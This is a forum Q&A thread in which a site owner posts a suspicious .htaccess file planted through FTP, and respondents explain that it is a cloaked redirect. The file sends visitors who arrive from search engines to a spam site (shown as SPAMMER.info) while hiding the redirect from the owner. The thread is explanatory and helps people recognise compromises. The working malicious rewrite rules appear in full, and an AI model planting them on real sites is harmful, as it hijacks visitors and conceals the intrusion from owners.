Suspicious .htaccess File
This was uploaded to one of my FTP folders. I'm not familiar with Apache, but still curious - can someone tell me what type of dastardly act this file is trying to commit? Thanks!
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
Solution 1:
That sends users that come from a search engine to the last site SPAMMER.info
(see question history for actual site).
It looks for referrers in an attempt to hide from you, since you likely don't access the site via search engines. That is, if you go to the URL directly, everything seems normal. However, if you come in via a search engine, you get redirected.
Note: this does not affect web crawlers as they (googlebot, at least) don't set the referrer header.
Solution 2:
Any time a user from a search engine any page on your site, they'll be redirected to .info spam site.
It's very sneaky - you won't notice anything is wrong as you'll normally just type the address in.
Solution 3:
to add more - most probably your ftp credentials got leaked. maybe you had them saved in filezilla / total commander etc. there is plenty of malware stealing those and then 'going' around - logging on to ftp accounts, attaching malicious javascript to index.php / html or putting similar rewrite files.